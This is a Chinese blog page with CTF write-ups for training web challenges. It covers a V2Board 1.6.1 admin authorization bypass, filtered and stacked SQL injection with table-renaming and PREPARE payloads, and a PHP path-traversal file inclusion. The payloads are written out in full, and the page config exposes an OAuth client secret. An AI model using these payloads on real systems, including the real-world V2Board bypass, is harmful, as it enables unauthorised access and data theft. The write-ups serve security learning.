<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Latte">
    
    <title>
        
            集训WriteUp-2 |
        
        Latte&#39;s
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.png">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"ohvy.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Latte's","author":"Latte","avatar":"/images/cat.svg","logo":"/images/logo.png","favicon":"/images/logo.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","tools":"/tools","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Latte and Americano.","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://github.com/ohvy","weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":"shiwwang@163.com"}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"gitalk","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":"ohvy","github_admins":null,"repository":"gitalk-comments","client_id":"Ov23liQm7PTQpK5JLa0h","client_secret":"ba0525d7d59a301a09ac76ed9299df6ceb9a42a5","proxy":"https://worker-ohvy.shiwwang.workers.dev/?https://github.com/login/oauth/access_token"},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":false,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":false,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{"tools":[{"category":"聊天 AI"},{"name":"ChatGPT","link":"https://chat.openai.com/","description":"OpenAI 旗下 AI 聊天对话工具","image":"/images/tools/chatgpt.svg"},{"name":"Gemini","link":"https://gemini.google.com/app","description":"Google 旗下 AI 聊天对话工具","image":"/images/tools/gemini.svg"},{"category":"待开发"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Latte&#39;s
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                
                                标签
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tools"
                            >
                                
                                工具
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags"
                    >标签</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tools"
                    >工具</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        集训WriteUp-2
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/cat.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Latte</span>
                                
                                    <span class="author-badge">Lv3</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2023-01-15 16:55:35</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Mon May 06 2024 20:45:33 GMT+0800">2024-05-06 20:45:33</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/Write-Up/">Write Up</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/CTF/">CTF</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/web/">web</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <p>2023-01-15 WP</p>
<h1 id="T1-hgame-2023-v2board"><a href="#T1-hgame-2023-v2board" class="headerlink" title="T1 [hgame 2023]v2board"></a>T1 [hgame 2023]v2board</h1><p><a class="link"   target="_blank" rel="noopener" href="https://hgame.vidar.club/contest/3" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<p>题目考察去年12月份的一个V2Board v1.6.1版本的Admin.php越权访问漏洞（注册个号进去看看就会发现左下角的”V2Board v1.6.1”，放bing上一查就能看到）。其原理这里就不赘述，放一个利用的过程：</p>
<ol>
<li>任意注册一个账号，通过<code>/api/v1/passport/auth/login</code>接口登录时用抓包工具获取响应包的<code>auth_data</code></li>
</ol>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/1-1.png"
                        class="" title="获取auth_data"
                 >

<ol start="2">
<li>然后访问<code>/api/v1/user/info</code>接口，并将上述获得的<code>auth_data</code>作为<code>authorization</code>头发送，这一步的目的是让服务器将普通用户的Authorization头写入缓存中（事实上这里自动实现了，auth_data 会随着登录缓存于 Redis ）</li>
</ol>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/1-2.png"
                        class="" title="缓存"
                 >

<ol start="3">
<li>最后只要带上这个Authorization头即可访问所有的管理员接口，比如<code>/api/v1/admin/user/fetch</code>等</li>
</ol>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/1-3.png"
                        class="" title="token"
                 >

<p>可以直接在上图找到admin的订阅token（对着源码找接口找了半天，以为订阅会在plan接口中。没注意到“众所周知v2board的管理员信息和用户信息都在user表，仅用is_admin字段区分是否管理员”，纯纯大怨种）</p>
<blockquote>
<p><a class="link"   target="_blank" rel="noopener" href="https://github.com/v2board/v2board/blob/master/app/Http/Routes/AdminRoute.php" >路由接口源码<i class="fas fa-external-link-alt"></i></a><br><br><a class="link"   target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/k_3IoymZL510wET8P3YHAw?ref=www.ctfiot.com" >V2Board Admin.php 越权访问漏洞<i class="fas fa-external-link-alt"></i></a><br><br><a class="link"   target="_blank" rel="noopener" href="https://zgao.top/v2board-v-1-6-1-%e6%9c%ba%e5%9c%ba%e9%9d%a2%e6%9d%bf%e7%ae%a1%e7%90%86%e6%8e%a5%e5%8f%a3%e8%b6%8a%e6%9d%83%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" >v2board v.1.6.1 机场面板管理接口越权漏洞分析<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<p>2023-01-23 WP</p>
<h1 id="T2-hgame-2023-Search-Commodity"><a href="#T2-hgame-2023-Search-Commodity" class="headerlink" title="T2 [hgame 2023]Search Commodity"></a>T2 [hgame 2023]Search Commodity</h1><p><a class="link"   target="_blank" rel="noopener" href="https://hgame.vidar.club/contest/3" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<p>弱密码登录，找个字典用Burp Suite暴力破解一下就好，密码比较常见：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">用户名:user01</span><br><span class="line">密  码:admin123</span><br></pre></td></tr></table></figure>

<p>“简易的查询面板，只需要输入id数字，就可以查到兔兔最近买的东西（包括年货）”，从题目描述基本上能够判断考察sql注入，但是不知道过滤了什么，需要自己测试。先按要求输入id数字<code>1</code>，查询结果为<code>hard disk 1</code>，然后试一试<code>and 1</code>，查询结果不变，不难猜测是将部分关键字用replace替换掉了，这跟我上一周遇到的sql题([极客大挑战 2019]BabySQL)很像。同样的办法可以测出部分我们将要用到的其他被过滤的字符：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and, or, select, union, from, where, database, =, /**/, &lt;, &gt;</span><br></pre></td></tr></table></figure>

<p>值得注意的是，这里空格也被过滤了：输入<code>o r1</code>查询结果不变。可能是先对输入的内容中所有的空格进行了去除，然后再对其他字符进行二次过滤。绕过空格可以使用<strong>注释符<code>/**/</code><strong>和括号<code>()</code>。之后再用</strong>双写绕过</strong>即可。</p>
<p>爆字段数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/oorrder//**/**/by//**/**/4#                    //测试为4时报错，故字段数为3</span><br></pre></td></tr></table></figure>

<p>判断回显位为2, 3</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/uunionnion//**/**/sselectelect//**/**/1,2,3#   </span><br></pre></td></tr></table></figure>

<p>爆库名为<code>se4rch</code>，很奇怪，这里只能把库名放第二个回显位，否则回显<code>Not Found 0</code>，留个疑问。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/uunionnion//**/**/sselectelect//**/**/1,ddatabaseatabase(),3#                           </span><br></pre></td></tr></table></figure>

<p>爆表名，’&#x3D;’可以用’like’或’!&lt;&gt;’绕过，得到”5ecret15here,L1st,user1nf0”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/uunionnion//**/**/sselectelect//**/**/1,group_concat(table_name),3/*/**/*/ffromrom(infoorrmation_schema.tables)wwherehere(table_schema//**/**/like//**/**/ddatabaseatabase())#</span><br></pre></td></tr></table></figure>

<p>爆字段名，得到”f14gggg1shere”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/uunionnion//**/**/sselectelect//**/**/1,group_concat(column_name),3/*/**/*/ffromrom(infoorrmation_schema.columns)wwherehere(table_name//**/**/like//**/**/&#x27;5ecret15here&#x27;)#</span><br></pre></td></tr></table></figure>

<p>爆数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0//**/**/uunionnion//**/**/sselectelect//**/**/1,group_concat(f14gggg1shere),3/*/**/*/ffromrom(5ecret15here)#</span><br></pre></td></tr></table></figure>

<p>成功拿到Flag:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hgame&#123;4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!&#125;</span><br></pre></td></tr></table></figure>

<h1 id="T3-hgame-2023-Designer"><a href="#T3-hgame-2023-Designer" class="headerlink" title="T3 [hgame 2023]Designer"></a>T3 [hgame 2023]Designer</h1><p><a class="link"   target="_blank" rel="noopener" href="https://hgame.vidar.club/contest/3" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<p>题目给了源码。</p>
<p>2023-01-23 WP</p>
<h1 id="T4-强网杯-2019-随便注"><a href="#T4-强网杯-2019-随便注" class="headerlink" title="T4 [强网杯 2019]随便注"></a>T4 [强网杯 2019]随便注</h1><p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<p>是一道sql注入题，先用<code>1&#39;</code>判断一下闭合方式，回显报错信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27;&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>是用单引号<code>&#39;</code>闭合，万能密码<code>1&#39; or 1=1#</code>能爆出所有数据。<br>下面按部就班的爆字段数(两个字段)：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; order by 3#</span><br></pre></td></tr></table></figure>

<p>但是在爆表名的时候发现<code>select</code>被过滤了，且大小写绕过无效。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return preg_match(&quot;/select|update|delete|drop|insert|where|\./i&quot;,$inject);</span><br></pre></td></tr></table></figure>

<h2 id="堆叠注入学习-堆叠查询，Stacked-Queries"><a href="#堆叠注入学习-堆叠查询，Stacked-Queries" class="headerlink" title="堆叠注入学习(堆叠查询，Stacked Queries)"></a>堆叠注入学习(堆叠查询，Stacked Queries)</h2><p>联合查询不可用，这里补充一下堆叠查询的知识。堆叠注入为攻击者提供了很多控制权，与仅限于SELECT语句的UNION联合查询攻击不同，堆叠注入可以用于执行任何SQL语句。</p>
<h3 id="堆叠注入原理"><a href="#堆叠注入原理" class="headerlink" title="堆叠注入原理"></a>堆叠注入原理</h3><p>在sql中，分号表示一条语句的结束。如果在分号的后面再加一条语句，这条语句也可以被执行，继续加一个分号和一条语句，这样就可以在一次数据库的调用中执行多个语句。如下图:</p>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/4-1.png"
                        class="" title="test"
                 >

<h3 id="堆叠注入利用"><a href="#堆叠注入利用" class="headerlink" title="堆叠注入利用"></a>堆叠注入利用</h3><p>利用这一点，我们可以用<code>1&#39;;show databases;#</code>查出库名，用<code>1&#39;;show tables;#</code>查出表名:</p>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/4-2.png"
                        class="" title="tables"
                 >

<p>然后用<code>desc</code>查表结构。</p>
<blockquote>
<p>这里补充一点，所有数据库对象（数据库名、表名、字段名、索引名等）命名禁止使用MySQL保留关键字，如果要用，就必须加上反引号。对于纯数字的数据库对象也是如此，否则就会报错。</p>
</blockquote>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/4-3.png"
                        class="" title="tests"
                 >

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;desc `1919810931114514`;#</span><br></pre></td></tr></table></figure>

<p>对’1919810931114514’表查一下，找到’flag’字段，但是不能直接进行查询。下面<code>1&#39;;desc words;#</code>查一下’words’的表结构</p>
<img  
                       lazyload
                       alt="image"
                       data-src="/2023/01/15/%E9%9B%86%E8%AE%ADWriteUp-2/4-4.png"
                        class="" title="words"
                 >

<p>可以看到是两个字段，一个是int型的id，另一个是varchar型的data，又结合输入1时的查询结果，不难推测出提交窗口的查询语句形如:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select id,data from words where id =</span><br></pre></td></tr></table></figure>

<p>。因此，只要我们利用堆叠注入更改’1919810931114514’表名为’words’，再把列名flag改成id，然后用既定的查询功能查询’words’表，就可以实现实际上对’1919810931114514’表的查询啦。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 更改原words表名:</span><br><span class="line">rename table words to bye;</span><br><span class="line"># 更改表名:</span><br><span class="line">rename table `1919810931114514` to words;</span><br><span class="line"># 更改字段名: 【ALTER TABLE &lt;表名&gt; CHANGE &lt;旧字段名&gt; &lt;新字段名&gt; &lt;新数据类型&gt;;】</span><br><span class="line">alter table words change flag id varchar(100);</span><br></pre></td></tr></table></figure>

<h3 id="Payload-1"><a href="#Payload-1" class="headerlink" title="Payload 1"></a>Payload 1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 更改表名、字段名</span><br><span class="line">1&#x27;;rename table words to bye;rename table `1919810931114514` to words;alter table words change flag id varchar(100);#</span><br><span class="line"># 爆数据</span><br><span class="line">1&#x27; or 1=1#</span><br></pre></td></tr></table></figure>

<h2 id="预处理语句-堆叠注入"><a href="#预处理语句-堆叠注入" class="headerlink" title="预处理语句+堆叠注入"></a>预处理语句+堆叠注入</h2><p>这种办法主要是对select的过滤进行绕过。<br>预处理语句使用方式:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PREPARE name from &#x27;[my sql sequece]&#x27;;   //预定义SQL语句</span><br><span class="line">EXECUTE name;  //执行预定义SQL语句</span><br><span class="line">(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句</span><br></pre></td></tr></table></figure>

<p>预定义语句也可以通过变量进行传递:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SET @tn = &#x27;hahaha&#x27;;  //存储表名</span><br><span class="line">SET @sql = concat(&#x27;select * from &#x27;, @tn);  //存储SQL语句</span><br><span class="line">PREPARE name from @sql;   //预定义SQL语句</span><br><span class="line">EXECUTE name;  //执行预定义SQL语句</span><br><span class="line">(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句</span><br></pre></td></tr></table></figure>

<p>然后利用char()函数将select的ASCII码转换为select字符串，或直接用concat()函数拼接select来绕过就可以了。</p>
<h3 id="Payload-2"><a href="#Payload-2" class="headerlink" title="Payload 2"></a>Payload 2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;PREPARE hacker from concat(char(115,101,108,101,99,116), &#x27; * from `1919810931114514` &#x27;);EXECUTE hacker;#</span><br><span class="line">1&#x27;;PREPARE hacker from concat(&#x27;s&#x27;,&#x27;elect&#x27;, &#x27; * from `1919810931114514` &#x27;);EXECUTE hacker;#</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参考这位师傅的WriteUp: <a class="link"   target="_blank" rel="noopener" href="https://www.jianshu.com/p/6c6a44517dd7" >[强网杯 2019]随便注 WriteUp(three way)<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<p>2023-01-24 WP</p>
<h1 id="T5-HCTF-2018-WarmUp"><a href="#T5-HCTF-2018-WarmUp" class="headerlink" title="T5 [HCTF 2018]WarmUp"></a>T5 [HCTF 2018]WarmUp</h1><p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[HCTF%202018]WarmUp" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<p>一道简单的PHP代码审计。检查得到提示’source.php’，访问给出源码:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    class emmm</span><br><span class="line">    &#123;</span><br><span class="line">        public static function checkFile(&amp;$page)</span><br><span class="line">        &#123;</span><br><span class="line">            $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];</span><br><span class="line">            if (! isset($page) || !is_string($page)) &#123;</span><br><span class="line">                echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">                return false;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            if (in_array($page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = urldecode($page);</span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $_page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($_page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line">            echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (! empty($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; is_string($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; emmm::checkFile($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">    ) &#123;</span><br><span class="line">        include $_REQUEST[&#x27;file&#x27;];</span><br><span class="line">        exit;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;</span><br><span class="line">    &#125;  </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><p>访问’hint.php’被告知”flag not here, and flag in ffffllllaaaagggg”，用源代码中的<code>include</code>文件包含就能打开。首先它先判定了传入的是不是空或者是不是字符串，然后用<code>emmm::checkFile</code>进行了三次白名单判断:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mb_substr(</span><br><span class="line">    string $str,</span><br><span class="line">    int $start,</span><br><span class="line">    int $length = NULL,</span><br><span class="line">    string $encoding = mb_internal_encoding()</span><br><span class="line">)</span><br><span class="line">从start开始截取一定长度的字符串</span><br><span class="line"></span><br><span class="line">strpos(</span><br><span class="line">    string $haystack, </span><br><span class="line">    string $needle, </span><br><span class="line">    int $offset = 0</span><br><span class="line">)</span><br><span class="line">返回 needle 在 haystack 中首次出现的数字位置</span><br></pre></td></tr></table></figure>

<p>第一次$_page取的是从0（第一个字符）开始到第一次出现 ? 之间的字符串，第二次$_page取的是$page的url解码后从0开始到第一次出现 ? 之间的字符串。</p>
<blockquote>
<p>事实上，超全局变量$GET和$REQUEST已经被解码过了。</p>
</blockquote>
<p>只需要添加一个<code>hint.php?</code>绕过白名单过滤，然后利用任意文件读取漏洞就能成功读到flag了。</p>
<h2 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=hint.php?../../../../../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>

                </div>
                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/CTF/">CTF</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/web/">web</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
